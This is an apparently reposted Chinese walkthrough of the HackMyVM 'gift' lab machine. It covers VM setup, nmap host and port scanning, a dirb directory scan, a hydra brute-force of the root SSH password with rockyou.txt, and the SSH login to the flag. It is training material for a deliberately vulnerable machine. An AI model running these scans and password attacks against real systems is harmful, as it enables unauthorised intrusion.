当前位置:首页 > 编程笔记 > 正文
已解决

hackmyvm之gift

来自网友在路上 145845提问 提问时间:2023-10-24 03:39:39阅读次数: 45

最佳答案 问答题库458位专家为你答疑解惑

hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。

(这段解释参考这篇文章)

下载安装

(需要科学上网)
下载地址:https://hackmyvm.eu/machines/

进去之后注册登陆账号

点击machines,下载需要的虚拟机

image-20231023111952990

image-20231023120128831

靶机下载完成之后,导入VMware

但是导入过程中出现了下面的报错

image-20231023165645063

重启电脑什么的也没用,应该是自己下的虚拟机有问题,于是我重新下载了个虚拟机,就可以成功运行了

image-20231023185727295

靶机gift

因为靶机gift和kali都在VM中,所以将两者都改为nat模式。

打开kali

查看kali ip

ifconfig
查出来是192.168.25.139

靶机和kali都是nat模式,用nmap扫描同网段的存活主机,这样就可以找到靶机的ip

nmap -sP 192.168.25.0/24

image-20231023221925392

查找靶机开放端口

nmap -A -p 1-1000 192.168.25.150

image-20231023222210165

访问80端口

image-20231023222435315

扫描目录,无果

dirb http://192.168.25.150

image-20231023223729180

转战ssh,因为没有告诉靶机ssh密码信息,所以选择直接爆破

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://192.168.25.150

image-20231023224938736

有了密码之后,远程连接,拿到flag

ssh root@192.168.25.150

image-20231023225309352

查看全文

99%的人还看了

猜你感兴趣

版权申明

本文"hackmyvm之gift":http://eshow365.cn/6-22941-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!